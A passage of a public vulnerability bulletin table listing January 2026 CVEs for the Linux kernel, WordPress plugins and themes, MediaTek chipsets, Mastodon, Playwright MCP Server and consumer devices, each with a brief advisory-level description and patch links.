| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/amd: Fix potential out-of-bounds read in iommu_mmio_show In iommu_mmio_write(), it validates the user-provided offset with the check: `iommu->dbg_mmio_offset > iommu->mmio_phys_end - 4`. This assumes a 4-byte access. However, the corresponding show handler, iommu_mmio_show(), uses readq() to perform an 8-byte (64-bit) read. If a user provides an offset equal to `mmio_phys_end - 4`, the check passes, and will lead to a 4-byte out-of-bounds read. Fix this by adjusting the boundary check to use sizeof(u64), which corresponds to the size of the readq() operation. | 2026-01-05 | not yet calculated | CVE-2025-68760 | https://git.kernel.org/stable/c/b959df804c33913dbfdb90750f2d693502b3d126 https://git.kernel.org/stable/c/0ec4aaf5f3f559716a6559f3d6d9616e9470bed6 https://git.kernel.org/stable/c/a0c7005333f9a968abb058b1d77bbcd7fb7fd1e7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfs: fix potential use after free in hfs_correct_next_unused_CNID() This code calls hfs_bnode_put(node) which drops the refcount and then dreferences "node" on the next line. It's only safe to use "node" when we're holding a reference so flip these two lines around. | 2026-01-05 | not yet calculated | CVE-2025-68761 | https://git.kernel.org/stable/c/40a1e0142096dd7dd6cb5373841222b528698588 https://git.kernel.org/stable/c/c105e76bb17cf4b55fe89c6ad4f6a0e3972b5b08 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: netpoll: initialize work queue before error checks Prevent a kernel warning when netconsole setup fails on devices with IFF_DISABLE_NETPOLL flag. The warning (at kernel/workqueue.c:4242 in __flush_work) occurs because the cleanup path tries to cancel an uninitialized work queue. When __netpoll_setup() encounters a device with IFF_DISABLE_NETPOLL, it fails early and calls skb_pool_flush() for cleanup. This function calls cancel_work_sync(&np->refill_wq), but refill_wq hasn't been initialized yet, triggering the warning. Move INIT_WORK() to the beginning of __netpoll_setup(), ensuring the work queue is properly initialized before any potential failure points. This allows the cleanup path to safely cancel the work queue regardless of where the setup fails. | 2026-01-05 | not yet calculated | CVE-2025-68762 | https://git.kernel.org/stable/c/a90d0dc38a10347078cca60e7495ad0648838f18 https://git.kernel.org/stable/c/760bc6ceda8e2c273c0e2018ad2595967c3dd308 https://git.kernel.org/stable/c/e5235eb6cfe02a51256013a78f7b28779a7740d5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: starfive - Correctly handle return of sg_nents_for_len The return value of sg_nents_for_len was assigned to an unsigned long in starfive_hash_digest, causing negative error codes to be converted to large positive integers. Add error checking for sg_nents_for_len and return immediately on failure to prevent potential buffer overflows. | 2026-01-05 | not yet calculated | CVE-2025-68763 | https://git.kernel.org/stable/c/6cd14414394b4f3d6e1ed64b8241d1fcc2271820 https://git.kernel.org/stable/c/0c3854d65cc4402cb8c52d4d773450a06efecab6 https://git.kernel.org/stable/c/1af5c973dd744e29fa22121f43e8646b7a7a71a7 https://git.kernel.org/stable/c/9b3f71cf02e04cfaa482155e3078707fe7f8aef4 https://git.kernel.org/stable/c/e9eb52037a529fbb307c290e9951a62dd728b03d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags When a filesystem is being automounted, it needs to preserve the user-set superblock mount options, such as the "ro" flag. | 2026-01-05 | not yet calculated | CVE-2025-68764 | https://git.kernel.org/stable/c/c09070b4def1b34e473a746c6a5331ccb80902c1 https://git.kernel.org/stable/c/dce10c59211e5cd763a62ea01e79b82a629811e3 https://git.kernel.org/stable/c/612cc98698d667df804792f0c47d4e501e66da29 https://git.kernel.org/stable/c/4b296944e632cf4c6a4cc8e2585c6451eae47b1b https://git.kernel.org/stable/c/df9b003a2ecacc7218486fbb31fe008c93097d5f https://git.kernel.org/stable/c/8675c69816e4276b979ff475ee5fac4688f80125 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mt76: mt7615: Fix memory leak in mt7615_mcu_wtbl_sta_add() In mt7615_mcu_wtbl_sta_add(), an skb sskb is allocated. If the subsequent call to mt76_connac_mcu_alloc_wtbl_req() fails, the function returns an error without freeing sskb, leading to a memory leak. Fix this by calling dev_kfree_skb() on sskb in the error handling path to ensure it is properly released. | 2026-01-05 | not yet calculated | CVE-2025-68765 | https://git.kernel.org/stable/c/594ff8bb69e239678a8baa461827ce4bb90eff8f https://git.kernel.org/stable/c/1c3c234af9407256ed670c8752923a672eea4225 https://git.kernel.org/stable/c/278bfed4529a0c9c9119f5a52ddafe69db61a75c https://git.kernel.org/stable/c/fb905e69941b44e03fe1a24e95328d45442b6d6d https://git.kernel.org/stable/c/4d42aba0ee49c0aa015c50c4f2a07cf8fa1c3a49 https://git.kernel.org/stable/c/53d1548612670aa8b5d89745116cc33d9d172863 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: irqchip/mchp-eic: Fix error code in mchp_eic_domain_alloc() If irq_domain_translate_twocell() sets "hwirq" to >= MCHP_EIC_NIRQ (2) then it results in an out of bounds access. The code checks for invalid values, but doesn't set the error code. Return -EINVAL in that case, instead of returning success. | 2026-01-05 | not yet calculated | CVE-2025-68766 | https://git.kernel.org/stable/c/324c60a67c4b9668497940f667db14d216cc7b1b https://git.kernel.org/stable/c/c21c606ad398eeb86a0f3aaff9ba4f2665e286c6 https://git.kernel.org/stable/c/3873afcb57614c1aaa5b6715554d6d1c22cac95a https://git.kernel.org/stable/c/09efe7cfbf919c4d763bc425473fcfee0dc98356 https://git.kernel.org/stable/c/efd65e2e2fd96f7aaa5cb07d79bbbfcfc80aa552 https://git.kernel.org/stable/c/7dbc0d40d8347bd9de55c904f59ea44bcc8dedb7 |
| loopus--WP Attractive Donations System - Easy Stripe & Paypal donations | Missing Authorization vulnerability in loopus WP Attractive Donations System - Easy Stripe & Paypal donations WP_AttractiveDonationsSystem allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Attractive Donations System - Easy Stripe & Paypal donations: from n/a through <= 1.25. | 2026-01-08 | not yet calculated | CVE-2025-22715 | https://vdp.patchstack.com/database/Wordpress/Plugin/WP_AttractiveDonationsSystem/vulnerability/wordpress-wp-attractive-donations-system-easy-stripe-paypal-donations-plugin-1-25-arbitrary-content-deletion-vulnerability?_s_id=cve |
| loopus--WP Virtual Assistant | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in loopus WP Virtual Assistant VirtualAssistant allows Stored XSS.This issue affects WP Virtual Assistant: from n/a through <= 3.0. | 2026-01-08 | not yet calculated | CVE-2025-22725 | https://vdp.patchstack.com/database/Wordpress/Plugin/VirtualAssistant/vulnerability/wordpress-wp-virtual-assistant-plugin-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| magentech--Rozy - Flower Shop | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in magentech Rozy - Flower Shop rozy allows PHP Local File Inclusion.This issue affects Rozy - Flower Shop: from n/a through <= 1.2.25. | 2026-01-08 | not yet calculated | CVE-2025-12549 | https://vdp.patchstack.com/database/Wordpress/Theme/rozy/vulnerability/wordpress-rozy-flower-shop-theme-1-2-25-local-file-inclusion-vulnerability?_s_id=cve |
| magepeopleteam--Car Rental Manager | Missing Authorization vulnerability in magepeopleteam Car Rental Manager car-rental-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Car Rental Manager: from n/a through <= 1.0.9. | 2026-01-06 | not yet calculated | CVE-2025-69327 | https://vdp.patchstack.com/database/Wordpress/Plugin/car-rental-manager/vulnerability/wordpress-car-rental-manager-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| mastodon--mastodon | Mastodon is a free, open-source social network server based on ActivityPub. By nature, Mastodon performs a lot of outbound requests to user-provided domains. Mastodon, however, has some protection mechanism to disallow requests to local IP addresses (unless specified in `ALLOWED_PRIVATE_ADDRESSES`) to avoid the "confused deputy" problem. The list of disallowed IP address ranges was lacking some IP address ranges that can be used to reach local IP addresses. An attacker can use an IP address in the affected ranges to make Mastodon perform HTTP requests against loopback or local network hosts, potentially allowing access to otherwise private resources and services. This is fixed in Mastodon v4.5.4, v4.4.11, v4.3.17 and v4.2.29. | 2026-01-08 | not yet calculated | CVE-2026-22245 | https://github.com/mastodon/mastodon/security/advisories/GHSA-xfrj-c749-jxxq https://github.com/mastodon/mastodon/commit/0f4e8a6240b5af1f2c3f34d2793d8610c6ef2aca https://github.com/mastodon/mastodon/commit/17022907866710a72a1b1fc0a5ce9538bad1b4c3 https://github.com/mastodon/mastodon/commit/71ae4cf2cf5138ccdda64b1b1d665849b688686d |
| MediaTek, Inc.--MT2718, MT6580, MT6739, MT6761, MT6765, MT6768, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6855, MT6873, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8195, MT8196, MT8370, MT8390, MT8391, MT8395, MT8676, MT8678, MT8696, MT8755, MT8766, MT8768, MT8781, MT8786, MT8788E, MT8791T, MT8792, MT8793, MT8796, MT8873, MT8883, MT8893 | In KeyInstall, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10276761; Issue ID: MSV-5141. | 2026-01-06 | not yet calculated | CVE-2025-20795 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8796 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10149879; Issue ID: MSV-4658. | 2026-01-06 | not yet calculated | CVE-2025-20787 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT2718, MT6765, MT6768, MT6781, MT6833, MT6835, MT6853, MT6855, MT6877, MT6879, MT6893, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8367, MT8391, MT8676, MT8678, MT8696, MT8766, MT8768, MT8781, MT8786, MT8788E, MT8791T, MT8792, MT8793, MT8796, MT8873, MT8883, MT8893 | In battery, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10315812; Issue ID: MSV-5534. | 2026-01-06 | not yet calculated | CVE-2025-20797 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT2718, MT6765, MT6768, MT6781, MT6833, MT6835, MT6853, MT6855, MT6877, MT6879, MT6893, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8367, MT8391, MT8676, MT8678, MT8696, MT8766, MT8768, MT8781, MT8786, MT8788E, MT8791T, MT8792, MT8793, MT8796, MT8873, MT8883, MT8893 | In battery, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10315812; Issue ID: MSV-5533. | 2026-01-06 | not yet calculated | CVE-2025-20798 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT2718, MT6899, MT6989, MT6991, MT8678, MT8793 | In mminfra, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10267349; Issue ID: MSV-5033. | 2026-01-06 | not yet calculated | CVE-2025-20800 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT2735, MT2737, MT6813, MT6815, MT6833, MT6835, MT6853, MT6855, MT6873, MT6875, MT6877, MT6878, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6896, MT6897, MT6899, MT6980, MT6983, MT6985, MT6986, MT6989, MT6990, MT6991, MT6993, MT8673, MT8675, MT8676, MT8678, MT8755, MT8771, MT8791, MT8791T, MT8792, MT8793, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893 | In Modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01689259 / MOLY01586470; Issue ID: MSV-4847. | 2026-01-06 | not yet calculated | CVE-2025-20794 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT2735, MT2737, MT6813, MT6815, MT6833, MT6835, MT6853, MT6855, MT6873, MT6875, MT6877, MT6878, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6896, MT6897, MT6899, MT6980, MT6983, MT6985, MT6989, MT6990, MT6991, MT6993, MT8673, MT8675, MT8676, MT8678, MT8755, MT8771, MT8791, MT8791T, MT8792, MT8793, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893 | In Modem, there is a possible system crash due to incorrect error handling. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01430930; Issue ID: MSV-4836. | 2026-01-06 | not yet calculated | CVE-2025-20793 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT2735, MT2737, MT6833, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6980, MT6980D, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT8673, MT8675, MT8676, MT8678, MT8755, MT8771, MT8791, MT8791T, MT8792, MT8793, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893 | In Modem, there is a possible system crash due to incorrect error handling. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01311265; Issue ID: MSV-4655. | 2026-01-06 | not yet calculated | CVE-2025-20761 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT2735, MT2737, MT6833, MT6835, MT6853, MT6855, MT6873, MT6875, MT6877, MT6878, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6896, MT6897, MT6899, MT6980, MT6983, MT6985, MT6986, MT6989, MT6990, MT6991, MT6993, MT8673, MT8675, MT8676, MT8678, MT8755, MT8771, MT8791, MT8791T, MT8792, MT8793, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893 | In Modem, there is a possible read of uninitialized heap data due to an uncaught exception. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01676750; Issue ID: MSV-4653. | 2026-01-06 | not yet calculated | CVE-2025-20760 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10184870; Issue ID: MSV-4729. | 2026-01-06 | not yet calculated | CVE-2025-20778 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible use after free due to a race condition. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10184084; Issue ID: MSV-4720. | 2026-01-06 | not yet calculated | CVE-2025-20779 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10184061; Issue ID: MSV-4712. | 2026-01-06 | not yet calculated | CVE-2025-20780 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10182914; Issue ID: MSV-4699. | 2026-01-06 | not yet calculated | CVE-2025-20781 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10182882; Issue ID: MSV-4685. | 2026-01-06 | not yet calculated | CVE-2025-20782 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10182882; Issue ID: MSV-4684. | 2026-01-06 | not yet calculated | CVE-2025-20783 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible memory corruption due to uninitialized data. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10182882; Issue ID: MSV-4683. | 2026-01-06 | not yet calculated | CVE-2025-20784 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10149882; Issue ID: MSV-4677. | 2026-01-06 | not yet calculated | CVE-2025-20785 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8196, MT8667, MT8673, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8791T, MT8792, MT8793, MT8795T, MT8796, MT8798, MT8873, MT8883 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10149882; Issue ID: MSV-4673. | 2026-01-06 | not yet calculated | CVE-2025-20786 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6835, MT6835T, MT6878, MT6878M, MT6897, MT6899, MT6991, MT8676, MT8678, MT8755, MT8792, MT8793, MT8863, MT8873, MT8883 | In Modem, there is a possible system crash due to incorrect error handling. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01685181; Issue ID: MSV-4760. | 2026-01-06 | not yet calculated | CVE-2025-20762 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6878, MT6897, MT6899, MT6985, MT6989, MT6991, MT6993, MT8792, MT8796, MT8798 | In seninf, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10251210; Issue ID: MSV-4926. | 2026-01-06 | not yet calculated | CVE-2025-20801 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6899, MT6991 | In dpe, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is needed for exploitation. Patch ID: ALPS10198951; Issue ID: MSV-4503. | 2026-01-06 | not yet calculated | CVE-2025-20804 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6899, MT6991, MT6993, MT8793 | In c2ps, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10274607; Issue ID: MSV-5049. | 2026-01-06 | not yet calculated | CVE-2025-20799 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6899, MT6991, MT8793 | In dpe, there is a possible memory corruption due to an integer overflow. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is needed for exploitation. Patch ID: ALPS10199779; Issue ID: MSV-4504. | 2026-01-06 | not yet calculated | CVE-2025-20803 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6899, MT6991, MT8793 | In dpe, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10114696; Issue ID: MSV-4480. | 2026-01-06 | not yet calculated | CVE-2025-20805 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6899, MT6991, MT8793 | In dpe, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10114835; Issue ID: MSV-4479. | 2026-01-06 | not yet calculated | CVE-2025-20806 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6899, MT6991, MT8793 | In dpe, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10114841; Issue ID: MSV-4451. | 2026-01-06 | not yet calculated | CVE-2025-20807 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6989, MT8796, MT8893 | In imgsys, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is needed for exploitation. Patch ID: ALPS10314745; Issue ID: MSV-5553. | 2026-01-06 | not yet calculated | CVE-2025-20796 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT6991, MT8196, MT8367, MT8781, MT8786, MT8793 | In geniezone, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10238968; Issue ID: MSV-4914. | 2026-01-06 | not yet calculated | CVE-2025-20802 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| Microsoft--Playwright | Microsoft Playwright MCP Server versions prior to 0.0.40 fails to validate the Origin header on incoming connections. This allows an attacker to perform a DNS rebinding attack via a victim's web browser and send unauthorized requests to a locally running MCP server, resulting in unintended invocation of MCP tool endpoints. | 2026-01-07 | not yet calculated | CVE-2025-9611 | https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-8rgw-6xp9-2fg3 https://github.com/microsoft/playwright/commit/1313fbd https://www.vulncheck.com/advisories/microsoft-playwright-mcp-server-dns-rebinding-via-missing-origin-header-validation |
| Mikado-Themes--Curly | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Curly curly allows PHP Local File Inclusion.This issue affects Curly: from n/a through < 3.3. | 2026-01-08 | not yet calculated | CVE-2025-67936 | https://vdp.patchstack.com/database/Wordpress/Theme/curly/vulnerability/wordpress-curly-theme-3-3-local-file-inclusion-vulnerability?_s_id=cve |
| Mikado-Themes--Hendon | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Hendon hendon allows PHP Local File Inclusion.This issue affects Hendon: from n/a through < 1.7. | 2026-01-08 | not yet calculated | CVE-2025-67937 | https://vdp.patchstack.com/database/Wordpress/Theme/hendon/vulnerability/wordpress-hendon-theme-1-7-local-file-inclusion-vulnerability?_s_id=cve |
| Mikado-Themes--Optimize | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Optimize optimizewp allows PHP Local File Inclusion.This issue affects Optimize: from n/a through < 2.4. | 2026-01-08 | not yet calculated | CVE-2025-67935 | https://vdp.patchstack.com/database/Wordpress/Theme/optimizewp/vulnerability/wordpress-optimize-theme-2-4-local-file-inclusion-vulnerability?_s_id=cve |
| Mikado-Themes--Wellspring | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Wellspring wellspring allows PHP Local File Inclusion.This issue affects Wellspring: from n/a through < 2.8. | 2026-01-08 | not yet calculated | CVE-2025-67934 | https://vdp.patchstack.com/database/Wordpress/Theme/wellspring/vulnerability/wordpress-wellspring-theme-2-8-local-file-inclusion-vulnerability?_s_id=cve |
| n/a-- GL Inet GL.Inet AX1800 Version 4.6.4 & 4.6.8 | An issue in GL Inet GL.Inet AX1800 Version 4.6.4 & 4.6.8 are vulnerable. GL.Inet AX1800 Version 4.6.4 & 4.6.8 in the GL.iNet custom opkg wrapper script located at /usr/libexec/opkg-call. The script is executed with root privileges when triggered via the LuCI web interface or authenticated API calls to manage packages. The vulnerable code uses shell redirection to create a lock file in the world-writable /tmp directory. | 2026-01-08 | not yet calculated | CVE-2025-67091 | https://www.gl-inet.com/ https://aleksazatezalo.medium.com/critical-command-injection-vulnerability-in-gl-inet-gl-axt1800-router-firmware-e6d67d81ee51?postPublishedType=repub https://aleksazatezalo.medium.com/critical-authentication-bypass-vulnerability-in-gl-inet-gl-axt1800-router-firmware-f19442ca721d |
| n/a-- realme Internet browser v.45.13.4.1 | An issue in realme Internet browser v.45.13.4.1 allows a remote attacker to execute arbitrary code via a crafted webpage in the built-in HeyTap/ColorOS browser | 2026-01-05 | not yet calculated | CVE-2025-67316 | http://internet.com http://realme.com https://gist.github.com/Brucewebva/ceb365b7cea0d0b8ec0ce6755177de83 |
